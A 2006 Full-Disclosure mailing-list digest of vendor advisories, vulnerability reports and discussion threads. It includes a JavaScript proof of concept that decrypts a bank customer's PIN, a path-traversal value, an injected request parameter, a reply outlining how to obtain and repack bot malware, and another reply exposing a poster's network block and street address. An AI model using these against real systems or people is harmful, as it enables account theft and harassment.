[Full-disclosure] [ GLSA 200611-22 ] Ingo H3: Folder name shell command injection

2006-11-27 Thread Sune Kloppenborg Jeppesen
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200611-22
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Ingo H3: Folder name shell command injection
      Date: November 27, 2006
      Bugs: #153927
        ID: 200611-22

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Ingo H3 is vulnerable to arbitrary shell command execution when
handling procmail rules.

Background
==========

Ingo H3 is a generic frontend for editing Sieve, procmail, maildrop and
IMAP filter rules.

Affected packages
=================

    -------------------------------------------------------------------
     Package              /   Vulnerable   /                 Unaffected
    -------------------------------------------------------------------
  1  www-apps/horde-ingo      < 1.1.2                         >= 1.1.2

Description
===========

Ingo H3 fails to properly escape shell metacharacters in procmail
rules.

Impact
======

A remote authenticated attacker could craft a malicious rule which
could lead to the execution of arbitrary shell commands on the server.

Workaround
==========

Don't use procmail with Ingo H3.

Resolution
==========

All Ingo H3 users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose =www-apps/horde-ingo-1.1.2

References
==========

  [ 1 ] CVE-2006-5449
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5449

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200611-22.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2006 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Cursor snarfing - a new class of vulnerability and attack in Oracle

2006-11-27 Thread David Litchfield
Hey all,
I've just written a paper detailing a fairly common PL/SQL programming error
related to cursors that leads to a new class of vulnerability in Oracle. You
can get a copy of the paper from http://www.databasesecurity.com/ .
Cheers,
David Litchfield
NGSSoftware Ltd
+44(0) 208 401 0070
http://www.ngssoftware.com/




Re: [Full-disclosure] Anonymizing RFI Attacks Through Google

2006-11-27 Thread Vincent Archer
On Sat, Nov 25, 2006 at 01:01:54AM -0500, Dude VanWinkle wrote:
 On 11/25/06, endrazine [EMAIL PROTECTED] wrote:
  this process of attack is a mere waste of time if one only reaches
  anonymity : in order to
  give google this new url to crawl, you'd have to either create a web
  page that points to this
  very page, or enter the url in the google database directly using their
  form. None of those two
  options are safer than attacking the website directly (google might very
  well log your actions),
  so  what's the point ?
 
 a lot of people are used to seeing google spider tracks in their logs.
 anonymizing your attack via google may make the admin investigating
 the attack think that a malfunctioning web bot was responsible for the
 attack, or they may skim over the entire incident accidentally.

Even if you are aware of an attack, the Google bot will not tell you
where the attacking URL comes from. So, if you're investigating the
hack, you have no data; you need to get Google to cooperate with you,
so they can find where the URL came from, and then investigate from
there.

That adds Google as an additional cut-out and delays any investigation.

-- 
Vincent ARCHER
[EMAIL PROTECTED]

Tel : +33 (0)1 40 07 47 14
Fax : +33 (0)1 40 07 47 27
Deny All - 23, rue Notre Dame des Victoires - 75002 Paris - France



[Full-disclosure] Defeating Image-Based Virtual Keyboards and Phishing Banks (fwd)

2006-11-27 Thread Gadi Evron
Copied from a post by Noam Rathaus on the SecuriTeam Blogs, following up a
post by HispaSec. This is about breaking virtual keyboards
implementations, and the encryption some of them use (most of them send
the data in clear text with the image). HispaSec was a reference by which
we found the banks' site as one using a virtual keyboard.

http://blogs.securiteam.com/index.php/archives/678

http://hispasec.com/laboratorio/cajamurcia_en.htm

Gadi.

Quoting:
Recently, I stumbled upon a post by HispaSec showing off a screen
shot trojan (http://hispasec.com/laboratorio/cajamurcia_en.htm) which
nicely showed how a trojan horse can, utilizing a key stroke capture and
screenshot capture, grab a user's PIN number, fairly easily, and wondered
why are they taking this approach when the PIN numbers can be easily
retrieved by sniffing the data sent by the user to the banking site, even
though they are encrypted.

Image based keyboard (or virtual keyboards) were invented to make life
harder for banking or phishing trojan horses (specifically key-stroke
loggers or key loggers), some even suggested they be used specifically to
avoid these trojan horses. The bad guys adapted to this technology and
escalated. Now the trojan horses take screenshots of where the mouse
pointer is to determine what number they clicked on. Thing is, it is often
unnecessary as in most implementations of this technique that we looked
into (meaning, not all) it was flawed.

Instead of sending the remote image and waiting for the key-stroke
information to be sent back to the server (the technique which the
screenshots for pointer location on-click described above was used) some
banks send the PIN number in cleartext, while others encrypt them, one
such example is cajamurcia. Even when the encryption is used, banks tend
to implement it badly making it easy to recover the PIN number from the
encrypted form.

I investigated a bit more on how cajamurcia handles such PIN strokes (with
virtual keyboards) and I noticed something strange, they take the
timestamp of their server (cajamurcia) and send it to you - this already
posses a security problem - and this timestamp is then used to encrypt the
PIN number you entered.

This would have been a good idea if the timestamp was not sent back to the
server, making it hard or semi-hard to guess the timestamp used to encrypt
the data, but at the same time making it harder for the server to know
what timestamp was provided to the client (unless they store it inside
their session information). Anyhow, as it is sent back to the server, we
have everything we need to decrypt the data (PIN number).

PoC:

A request to the server would look like:

OPERACION=0002 CAJA=2043 CAMINO=2043 PGDESTI=CORP BROKER=SI VRS=001
PAN=2043123456 SELLO=16100616012569 CL=1161006956 PINV3=si
PANA=2043 PANB=123456 PIN=BBCB6E341C56C6B2 IDIOMA=01

We are only interested in PIN=BBCB6E341C56C6B2 and CL=1161006956, CL being
the timestamp and PIN being the encrypted form of the PIN number. If we
feed these into the following JS code:

https://intelvia.cajamurcia.es/2043/01/scripts/MOD.js
function hexToString (h) {
    var r = "";
    for (var i = (h.substr(0, 2) == "0x") ? 2 : 0; i < h.length; i += 2) {
        r += String.fromCharCode(parseInt(h.substr(i, 2), 16));
    }
    return r;
}
calcula = '1161006956';
ciphertext = hexToString('0xBBCB6E341C56C6B2');
var cleartext = des(calcula.substr(2, 8), ciphertext, 0, 1, "");  // des() is defined in MOD.js
console.debug(cleartext);

We will get our original PIN number. This isn't necessarily easier as it
requires data capture, which isn't always easy, but screen captures
usually require either an OCR, or manual labor, which the above code does
not.

One needs to remember that Javascript (or any client-side code and
information) is indeed on the client's side and under the client's
control. An attacker can kick it aside, or learn to emulate it and attack
it - manipulate it. Client-side encryption where the code and key are
visible is pointless. No matter how much obfuscation or cross-frame and
cross-file scripting is used, calling for different functions and
parameters, nor how many functions you obfuscate your code through, it can
be read and maniuplated.

We made several email and phone attempts over the past couple of months to
reach cajamurcia  and report this security issue to them. Gadi Evron even
asked a couple of folks in Spain to help with contacting them by phone,
even speaking directly to security folks there. We were unsuccessful.

The bank is already under attack by the over-kill screenshot trojan
horses. We release this information in full disclosure in the hope many
online commerce sites using similar techniques or even sending the
information in the clear will fix their implementations of the virtual
keyboard Click-Me Number-Images Schemes. These are broken by the use of
the trojan horses we discussed, but that's a whole other story.

Noam Rathaus


[Full-disclosure] Sasser or other nasty worm needed

2006-11-27 Thread kikazz
I'm a high school network administration teacher looking for a creative
means of teaching my students the importance of patch management.  I was
hoping to let a particularly nasty worm loose on a closed lab so my students
could see what happens during an outbreak, but I'm running into a hitch - I
can't find a worm that would spread quickly enough to be useful.  

Does anyone have a copy of Sasser or a similar worm that they would be
willing to send or link me to?  Please contact me off-list.  I would be
happy to verify my identity as a high school teacher off-list as I'm sure
that is a concern for most anyone who has what I am looking for.  

Please do not reply on list as I am not currently a member.  

Thank you,

Chris



[Full-disclosure] MHL-2006-003 Public Advisory: mboard file creation issue

2006-11-27 Thread Mayhemic Labs Security
MHL-2006-004 - Public Advisory

+---+
|mboard Security Issue  |
+---+


PUBLISHED ON
  November 26th, 2006


PUBLISHED AT
  http://www.mayhemiclabs.com/advisories/MHL-2006-004.txt
  http://www.mayhemiclabs.com/wiki/wikka.php?wakka=MHL2006004


PUBLISHED BY
  Mayhemic Labs
  http://www.mayhemiclabs.com

  security AT mayhemiclabs DOT com
  GPG key: 0x56143F84


APPLICATION
  MBoard - PHP message board
  http://www.phpjunkyard.com/php-message-board.php

  MBoard is a PHP message board script (a simple forum).


AFFECTED VERSIONS
  Versions 1.22 and below


ISSUES
  MBoard does not check the Post ID for malicious data when replying,
  allowing an attacker to create blank files on the system wherever
  the web server has write access.

  Example: An attacker can reply to a message, and edit the orig_id
  variable to something malicious (../../../../../../tmp/ZOMGHAX);
  mboard will then create the specified file (appending the
  configured extension).

WORKAROUNDS
Enabling Magic Quotes will negate the issue.


SOLUTIONS
Upgrade to version 1.3


REFERENCES
MBoard - http://www.phpjunkyard.com/php-message-board.php


TIMELINE
October 11th, 2006
Vendor/Developer Notified
Vendor/Developer Response Received

October 25th, 2006
Vendor/Developer Followup
Vendor/Developer Response Received

November 16th, 2006
Vendor/Developer Followup

November 18th, 2006
New Version Released

November 26th, 2006
Advisory Released


ADDITIONAL CREDIT
  N/A

LICENSE
  Creative Commons Attribution-ShareAlike License
  http://creativecommons.org/licenses/by-sa/2.5



[Full-disclosure] The state of JavaScript Hacking

2006-11-27 Thread pdp (architect)
Please accept my apologies if the following post has offended you in any
way. The reason I posted it here is because I wanted to get this
message heard by a wider audience. What better place to talk about
this than the security mailing lists.

http://www.gnucitizen.org/blog/the-state-of-javascript-hacking/

In this post I would like to share a few thoughts with you about the
importance of JavaScript and other under-appreciated web technologies
and their impact on the computer security industry and our lives in
general. The purpose of this is to bring more light on the matter.
Although this topic is becoming clearer now, I can still see quite a
lot confused security professionals thriving to comprehend the core
principles of these, relatively new, types of attacks. In this article
I hope that I will be able to present my view as briefly and
accurately as possible.

As you might already know JavaScript is becoming more and more popular
among Web developers. The reason for this sudden growth is AJAX which
among other technologies brought some quite useful and exciting
features. Historically, AJAX is nothing new. This technology has been
known for ages although as I said earlier it has started being
implemented on a large scale just recently. One of the biggest AJAX
evangelists to date is Google which I believe is responsible for the
AJAX hype in general. This is just a personal opinion.

AJAX and JavaScript are nothing new to security professionals, either.
You can see that various attack vectors related to these technologies
have been discovered in the past. I am not talking about browser
vulnerabilities but pure design and implementation insecurities. Among
them there are techniques such as XSS (a.k.a Cross-site scripting) and
CSRF (a.k.a Cross-site request forgery). Both of them outline ways of
performing information gathering, session hijacking and request
forging. From the user perspective this is very serious but not that
many companies have taken it seriously because they don't really
understand them, I suppose.

You are probably aware of XSS and CSRF because the state of JavaScript
hacking today is based around them. However, because of them the
security industry has never really understood their real potential.
Simply put, performing session hijacking is not as interesting as
sniffing the air and forging someone's requests is just not as fun as
obtaining remote access. Will that change?

What security professionals must understand is that JavaScript is not
about web pages anymore. It is a technology that is currently
overtaking every WEB frontline and the desktop too. JavaScript is used
on servers, web pages and desktop applications. It is a bridge
technology. WEB designers use JavaScript to glue visual elements while
browser vendors glue desktops and servers. The technology is the same
all over the place which means less coding. That results into less
money spent. Very utopic I must say.

If you have less overhead with developing desktop and web applications
with JavaScript don't you think that attackers will have the same
benefit? They can write cross-platform viruses that can compromise
desktop and web applications at the same time. Code once, destruct
everywhere! Mozilla and Adobe are the biggest cheerleaders in this
game. Microsoft is somewhere behind but they are quickly catching up.

Mozilla with their XUL makes attackers life so much easier. It is not
that the Mozilla browser is vulnerable to any specific type of attack
but the past has already proved many times that eventually someone
will find an issue with the architecture. Then people will find the
same mistake in other places. The Mozilla XUL is considered a true RIA
(Rich Internet Application) platform that is currently the base of
many open source products. All of them support JavaScript, CSS, Flash
(if installed) and Java (if installed). If the developers of these
applications don't have deep understandings of the security
implications of the Mozilla platform the WEB will become suddenly very
dangerous place for them.

Adobe on the other hand is making the process of creating a browser so
transparent that everyone, I mean everyone, even your grandma will be
able to create one in seconds. I am talking about Adobe's Apollo
framework which is built on top of Flex. If you haven't heard of
it go and research now. Come back later. Don't get me wrong, I will
probably use this platform to write a few security tools but just
think about this for a second: developers will be able to write
applications that will integrate the desktop with the WEB using
already proven WEB technologies such as JavaScript, CSS, ActionScript,
Flash and AJAX. I don't really know what Apollo's security model will
be but apparently you can do whatever you want as long as the
application is installed on the host environment. BTW, you install
applications with a single click. Moreover, given the fact that Flash
is so well spread, I am almost 90% sure that Adobe will 

[Full-disclosure] rPSA-2006-0218-1 ImageMagick

2006-11-27 Thread rPath Update Announcements
rPath Security Advisory: 2006-0218-1
Published: 2006-11-27
Products: rPath Linux 1
Rating: Major
Exposure Level Classification:
Indirect User Deterministic Unauthorized Access
Updated Versions:
ImageMagick=/[EMAIL PROTECTED]:devel//1/6.2.3.3-3.4-1

References:
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5456
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4601
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0082
https://issues.rpath.com/browse/RPL-811
https://issues.rpath.com/browse/RPL-389

Description:
Previous versions of the ImageMagick package contained multiple
vulnerabilities.  Attacker-supplied malformed image files may
allow arbitrary code execution as the running user.



[Full-disclosure] rPSA-2006-0219-1 info install-info texinfo

2006-11-27 Thread rPath Update Announcements
rPath Security Advisory: 2006-0219-1
Published: 2006-11-27
Products: rPath Linux 1
Rating: Minor
Exposure Level Classification:
Indirect User Deterministic Unauthorized Access
Updated Versions:
info=/[EMAIL PROTECTED]:devel//1/4.8-6.2-1
install-info=/[EMAIL PROTECTED]:devel//1/4.8-6.2-1
texinfo=/[EMAIL PROTECTED]:devel//1/4.8-6.2-1

References:
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4810
https://issues.rpath.com/browse/RPL-810

Description:
Previous versions of the texinfo package can be caused to execute
arbitrary code contained in an intentionally malformed texinfo
file.  These texinfo commands are often run automatically when
building software packages.



[Full-disclosure] REMLAB Web Mech Designer 2.0.5 Path Disclosure Vulnerability

2006-11-27 Thread Jesper Jurcenoks
Description:
REMLAB http://remlab.sourceforge.net/  is a fully functional
cross-platform web-based Battlemech designer for the tactical board game
Battletech http://www.classicbattletech.com/ . REMLAB  is built
entirely on HTML, PHP, and JavaScript with AJAX functionality. The
vulnerability exists in calculate.php script which allows remote
attackers to obtain sensitive information via an HTTP request to
calculate.php that contains wrong value in Tonnage parameter. This
causes the information to be leaked in an error message.

External References: 
Mitre CVE: CVE-2006-5896
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5896  
NVD NIST: CVE-2006-5896
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2006-5896 
OSVDB: 30264 http://www.osvdb.com/displayvuln.php?osvdb_id=30264  

Summary: 
REMLAB is a fully functional cross-platform web-based Battlemech designer
for the tactical board game Battletech. 

A security problem in the product allows attackers to gather the true
path of the server-side script. 

Release Date:
November 27 2006

Severity:
Risk: Low
 
CVSS Metrics
Access Vector: Remote
Access Complexity: Low
Authentication: not-required
Confidentiality Impact: Partial
Integrity Impact: None
Availability Impact: None
Impact Bias: Normal
CVSS Base Score: 2.3
 
Target Distribution on Internet: Low
 
Exploitability: Functional Exploit
Remediation Level: Workaround
Report Confidence: Uncorroborated
 
Vulnerability Impact: Attack
Host Impact: Path disclosure.


SecureScout Testcase ID:
TC 17937

Vulnerable Systems:
REMLAB Web Mech Designer 2.0.5
http://sourceforge.net/project/showfiles.php?group_id=165798 

Vulnerability Type:
Input Validation error - The calculate.php script has a flaw which leads
to a Warning. This is an input validation fault when the script is not
testing the data passed.

Vendor Status: 
The Vendor has been contacted on November 14th 2006, by email and
phone. Vendor has not responded.
There is no official patch at this time.

Workaround:
Disable warning messages: modify in the php.ini file the following line:
display_errors = Off .

Example: 
HTTP REQUEST
http://[TARGET]/[REMLAB-directory]/include/calculate.php?Tonnage=%60 

REPLY
...
<b>Warning</b>:  Division by zero in <b>D:\WWWRoot\username\calculate.php</b> on line <b>438</b><br />

,,0.00,,1,,2,,12,,12,,8,,8,,2,,2,,10,,0.0,,0.0
... 

URL of Original Advisory: http://www.netvigilance.com/advisory0007 


Credits: 
Jesper Jurcenoks
Co-founder netVigilance, Inc
www.netvigilance.com http://www.netvigilance.com/ 




[Full-disclosure] [SECURITY] [DSA 1219-1] New texinfo packages fix multiple vulnerabilities

2006-11-27 Thread Noah Meyerhans
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- 
Debian Security Advisory DSA-1219-1[EMAIL PROTECTED]
http://www.debian.org/security/ Noah Meyerhans
November 27, 2006
- 

Package: texinfo
Vulnerability  : buffer overflow
Problem type   : local
Debian-specific: no
CVE Id(s)  : CVE-2005-3011 CVE-2006-4810
BugTraq ID : 14854 20959

Multiple vulnerabilities have been found in the GNU texinfo package, a
documentation system for on-line information and printed output.

CVE-2005-3011
Handling of temporary files is performed in an insecure manner, allowing
an attacker to overwrite any file writable by the victim.

CVE-2006-4810
A buffer overflow in util/texindex.c could allow an attacker to execute
arbitrary code with the victim's access rights by inducing the victim to
run texindex or tex2dvi on a specially crafted texinfo file.

For the stable distribution (sarge), these problems have been fixed in
version 4.7-2.2sarge2.  Note that binary packages for the mipsel
architecture are not currently available due to technical problems with
the build host.  These packages will be made available as soon as
possible.

For unstable (sid) and the upcoming stable release (etch), these
problems have been fixed in version 4.8.dfsg.1-4.

We recommend that you upgrade your texinfo package.

Upgrade instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian 3.1 (stable)
- ---

Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, m68k, 
mips, mipsel, powerpc, s390 and sparc.

Source archives:

  http://security.debian.org/pool/updates/main/t/texinfo/texinfo_4.7-2.2sarge2.dsc
    Size/MD5 checksum:      622 f146d738696417a3f14e04875066ef9a
  http://security.debian.org/pool/updates/main/t/texinfo/texinfo_4.7.orig.tar.gz
    Size/MD5 checksum:  1979183 72a57e378efb9898c9e41ca839554dae
  http://security.debian.org/pool/updates/main/t/texinfo/texinfo_4.7-2.2sarge2.diff.gz
    Size/MD5 checksum:    10614 07a591b00a79ba8e2acf13d7654bf3e8

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/t/texinfo/info_4.7-2.2sarge2_alpha.deb
    Size/MD5 checksum:   207720 1fce59e479c10386d5bab3d8aec99ddd
  http://security.debian.org/pool/updates/main/t/texinfo/texinfo_4.7-2.2sarge2_alpha.deb
    Size/MD5 checksum:   884956 93a3606294fd0059390b7da3c5803a1a

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/t/texinfo/info_4.7-2.2sarge2_amd64.deb
    Size/MD5 checksum:   191308 035c9fb7bffa818819e6e104218d5911
  http://security.debian.org/pool/updates/main/t/texinfo/texinfo_4.7-2.2sarge2_amd64.deb
    Size/MD5 checksum:   863680 8300c746fbb75231a09229f32f57d126

arm architecture (ARM)

  http://security.debian.org/pool/updates/main/t/texinfo/info_4.7-2.2sarge2_arm.deb
    Size/MD5 checksum:   178812 d8781c075692500d4d6a799019697a72
  http://security.debian.org/pool/updates/main/t/texinfo/texinfo_4.7-2.2sarge2_arm.deb
    Size/MD5 checksum:   848862 4d31ba02e3004a5e290d6204ba402b19

hppa architecture (HP PA RISC)

  http://security.debian.org/pool/updates/main/t/texinfo/texinfo_4.7-2.2sarge2_hppa.deb
    Size/MD5 checksum:   867668 934d2a72b73c4342066f1fba21c35fff
  http://security.debian.org/pool/updates/main/t/texinfo/info_4.7-2.2sarge2_hppa.deb
    Size/MD5 checksum:   195122 07ea3515643ddb8dc29791802974ec40

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/t/texinfo/texinfo_4.7-2.2sarge2_i386.deb
    Size/MD5 checksum:   846972 eb370f53f4db1681ead784353f6711c4
  http://security.debian.org/pool/updates/main/t/texinfo/info_4.7-2.2sarge2_i386.deb
    Size/MD5 checksum:   179614 ee08c755b1eb00043173acfdae2420d7

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/t/texinfo/texinfo_4.7-2.2sarge2_ia64.deb
    Size/MD5 checksum:   912350 c99196682ffe5436a1f99da332e77f91
  http://security.debian.org/pool/updates/main/t/texinfo/info_4.7-2.2sarge2_ia64.deb
    Size/MD5 checksum:   229398 e9e6dca2f2250bd07c0605e393105339

m68k architecture (Motorola Mc680x0)

  http://security.debian.org/pool/updates/main/t/texinfo/info_4.7-2.2sarge2_m68k.deb
    Size/MD5 checksum:   171354 93b5762ecf847bba77396f08b04e225e
  http://security.debian.org/pool/updates/main/t/texinfo/texinfo_4.7-2.2sarge2_m68k.deb
    Size/MD5 checksum:   838386 2d63f36ef81c84ae8bdad8f2be5f1797

mips architecture (MIPS (Big Endian))


Re: [Full-disclosure] Sasser or other nasty worm needed

2006-11-27 Thread [EMAIL PROTECTED]

Chris -

I don't know what to make of your "please reply off-list; I'm not a member"
comment.
It's almost as ridiculous as what you are requesting.

If I take your question at face value, you are an INSTRUCTOR, not an Admin.
That means you probably teach an A+ class, maybe an abbreviated CCNA
program.

You have NO FUCKING BUSINESS WHATSOEVER even THINKING about turning loose a
dangerous piece of Malware in someone else's network. And it IS someone
else's network; specifically it belongs to the district.

Speaking as a network engineer for a large midwestern school district, if you
did that in MY network, I'd have your job. GOD HELP YOU if it turns out
that you actually ARE a teacher in my district. I don't recognize the name,
but you can bet your ass that every time we have an infection in one of our
schools from now until the stars burn out; that I'll be making a point of
asking who the computer teachers are in that building.

You want to teach these kids a lesson? Write it on the blackboard.

We have enough work to do just keeping up with the kids, without an alleged
professional turning loose a worm in our network.


=
I'm a high school network administration teacher 
looking for a creative means of teaching my students 
the importance of patch management.  I was hoping to 
let a particularly nasty worm loose on a closed lab 
so my students could see what happens during an outbreak, 
but I'm running into a hitch - I can't find a worm that 
would spread quickly enough to be useful.  

Does anyone have a copy of Sasser or a similar worm 
that they would be willing to send or link me to?  
Please contact me off-list.  I would be happy to 
verify my identity as a high school teacher off-list 
as I'm sure that is a concern for most anyone who has 
what I am looking for.  

Please do not reply on list as I am not currently a member.  
Thank you,
Chris



mail2web - Check your email from the web at
http://mail2web.com/ .




Re: [Full-disclosure] [inbox] Sasser or other nasty worm needed

2006-11-27 Thread Exibar
wow, the fastest way to catch any type of worm like that is to stick an
unpatched, no A/V running,  windows box out on the internet.  You'll have so
many bugs you won't know what to do with them all...

  Exibr

 -Original Message-
 From: kikazz [mailto:[EMAIL PROTECTED]
 Sent: Sunday, November 26, 2006 5:32 PM
 To: full-disclosure@lists.grok.org.uk
 Subject: [inbox] [Full-disclosure] Sasser or other nasty worm needed


 I'm a high school network administration teacher looking for a creative
 means of teaching my students the importance of patch management.  I was
 hoping to let a particularly nasty worm loose on a closed lab so
 my students
 could see what happens during an outbreak, but I'm running into a
 hitch - I
 can't find a worm that would spread quickly enough to be useful.

 Does anyone have a copy of Sasser or a similar worm that they would be
 willing to send or link me to?  Please contact me off-list.  I would be
 happy to verify my identity as a high school teacher off-list as I'm sure
 that is a concern for most anyone who has what I am looking for.

 Please do not reply on list as I am not currently a member.

 Thank you,

 Chris







Re: [Full-disclosure] Sasser or other nasty worm needed

2006-11-27 Thread Michael Holstein
 Does anyone have a copy of Sasser or a similar worm that they would be
 willing to send or link me to?  Please contact me off-list.  I would be
 happy to verify my identity as a high school teacher off-list as I'm sure
 that is a concern for most anyone who has what I am looking for.  

You're kidding, right? .. just take a fresh install of Win2K and hook it 
to the Internet.

Go get coffee. Come back in ~15min.

Boot to BartPE (or Knoppix, etc) and look for anything new in 
%systemroot%. You'll probably have more than one. It'll be a binary 
though, probably packed/encrypted 3+ times (and that's annoying, but not 
impossible, to reverse-engineer).

The source code for all the [SD|RX|AGO]bot variants is easily found on 
the web. Recompile in Visual Basic, pack with UPX (or whatever) and off 
you go.

To prison that is...

Meanwhile .. a quick look at your email :

Received: from blueberry ( [69.3.80.94])
by mx.google.com with ESMTP id i20sm9690041wxd.2006.11.26.14.32.22;
Sun, 26 Nov 2006 14:32:22 -0800 (PST)
From: kikazz [EMAIL PROTECTED]

suggests that you aren't a teacher at all ..

network:IP-Network-Block:69.3.80.88 - 69.3.80.95
network:Org-Name:Compu' Counts Consulting Inc.
network:Street-Address:6174 Darleon Place
network:City:ALEXANDRIA
network:State:VA
network:Postal-Code:22310

sigh .. another consultant that is trying to get other folks to do his 
dirty work...

Cheers,

Michael Holstein CISSP GCIA
Information Security Administrator
Cleveland State University



Re: [Full-disclosure] Defeating Image-Based Virtual Keyboards and Phishing Banks (fwd)

2006-11-27 Thread Debasis Mohanty
More than a year Old (3rd August, 2005) - 

Defeating CITI-BANK Virtual Keyboard Protection
http://archives.neohapsis.com/archives/fulldisclosure/2005-08/0142.html

http://hackingspirits.com/vuln-rnd/Defeat-CitiBank-VK.zip

http://xforce.iss.net/xforce/xfdb/21727


Regards,
-d



-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Gadi Evron
Sent: Sunday, November 26, 2006 12:18 PM
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] Defeating Image-Based Virtual Keyboards
and Phishing Banks (fwd)

Copied from a post by Noam Rathaus on the SecuriTeam Blogs, following up a
post by HispaSec. This is about breaking virtual keyboards implementations,
and the encryption some of them use (most of them send the data in clear
text with the image). HispaSec was a reference by which we found the banks'
site as one using a virtual keyboard.

http://blogs.securiteam.com/index.php/archives/678

http://hispasec.com/laboratorio/cajamurcia_en.htm

Gadi.

Quoting:
Recently, I stumbled upon a post by HispaSec showing off a screen shot
trojan (http://hispasec.com/laboratorio/cajamurcia_en.htm) which nicely
showed how a trojan horse can, utilizing a key stroke capture and screenshot
capture, grab a user's PIN number, fairly easily, and wondered why are they
taking this approach when the PIN numbers can be easily retrieved by
sniffing the data sent by the user to the banking site, even though they are
encrypted.

Image-based keyboards (or virtual keyboards) were invented to make life
harder for banking or phishing trojan horses (specifically key-stroke
loggers or key loggers), some even suggested they be used specifically to
avoid these trojan horses. The bad guys adapted to this technology and
escalated. Now the trojan horses take screenshots of where the mouse pointer
is to determine what number they clicked on. Thing is, it is often
unnecessary as in most implementations of this technique that we looked into
(meaning, not all) it was flawed.

Instead of sending the remote image and waiting for the key-stroke
information to be sent back to the server (the technique which the
screenshots for pointer location on-click described above was used) some
banks send the PIN number in cleartext, while others encrypt them, one such
example is cajamurcia. Even when the encryption is used, banks tend to
implement it badly making it easy to recover the PIN number from the
encrypted form.

I investigated a bit more on how cajamurcia handles such PIN strokes (with
virtual keyboards) and I noticed something strange, they take the timestamp
of their server (cajamurcia) and send it to you - this already poses a
security problem - and this timestamp is then used to encrypt the PIN number
you entered.

This would have been a good idea if the timestamp was not sent back to the
server, making it hard or semi-hard to guess the timestamp used to encrypt
the data, but at the same time making it harder for the server to know what
timestamp was provided to the client (unless they store it inside their
session information). Anyhow, as it is sent back to the server, we have
everything we need to decrypt the data (PIN number).

PoC:

A request to the server would look like:

OPERACION=0002 CAJA=2043 CAMINO=2043 PGDESTI=CORP BROKER=SI VRS=001
PAN=2043123456 SELLO=16100616012569 CL=1161006956 PINV3=si
PANA=2043 PANB=123456 PIN=BBCB6E341C56C6B2 IDIOMA=01

We are only interested in PIN=BBCB6E341C56C6B2 and CL=1161006956, CL being
the timestamp and PIN being the encrypted form of the PIN number. If we feed
these into the following JS code:

https://intelvia.cajamurcia.es/2043/01/scripts/MOD.js
function hexToString (h) {
    var r = "";
    // skip a leading "0x" and turn every hex pair into one character
    for (var i = (h.substr(0, 2) == "0x") ? 2 : 0; i < h.length; i += 2) {
        r += String.fromCharCode(parseInt(h.substr(i, 2), 16));
    }
    return r;
}
calcula = '1161006956';                               // CL, the server timestamp
ciphertext = hexToString('0xBBCB6E341C56C6B2');       // PIN, the encrypted PIN
// des() is defined in the bank's MOD.js linked above; 8 bytes of the
// timestamp are the key, 0 = decrypt, 1 = CBC, empty IV
var cleartext = des(calcula.substr(2, 8), ciphertext, 0, 1, "");
console.debug(cleartext);

We will get our original PIN number. This isn't necessarily easier as it
requires data capture, which isn't always easy, but screen captures usually
require either an OCR, or manual labor, which the above code does not.

One needs to remember that Javascript (or any client-side code and
information) is indeed on the client's side and under the client's control.
An attacker can kick it aside, or learn to emulate it and attack it -
manipulate it. Client-side encryption where the code and key are visible is
pointless. No matter how much obfuscation or cross-frame and cross-file
scripting is used, calling for different functions and parameters, nor how
many functions you obfuscate your code through, it can be read and
manipulated.

We made several email and phone attempts over the past couple of months to
reach cajamurcia  and report this security issue to them. Gadi Evron even
asked a couple of folks in Spain to help with contacting them by phone, even
speaking 

Re: [Full-disclosure] Sasser or other nasty worm needed

2006-11-27 Thread deep fried

What am I

Consultant?
School Teacher?
Terrorist?





On 11/27/06, K F (lists) [EMAIL PROTECTED] wrote:


Dude... settle the hell down.

I see little problem with this guy doing this on a closed LAN in a lab
setting. What part of CLOSED LAB did you miss? It's not like he is
intentionally letting it loose on the entire school LAN.

-KF

[EMAIL PROTECTED] wrote:
 Chris -

 I don't know what to make of your please reply off-list; I'm not a
member
 comment.
 It's almost as ridiculous as what you are requesting.

 If I take your question at face value, you are an INSTRUCTOR, not an
Admin.
 That means you probably teach an A+ class, maybe an abbreviated CCNA
 program.

 You have NO FUCKING BUSINESS WHATSOEVER even THINKING about turning
loose a
 dangerous piece of Malware in someone else's network. And it IS someone
 else's network; specifically it belongs to the district.

 Speaking as a network engineer for a large midwestern school district, if you
 did that in MY network, I'd have your job. GOD HELP YOU if it turns out
 that you actually ARE a teacher in my district. I don't recognize the
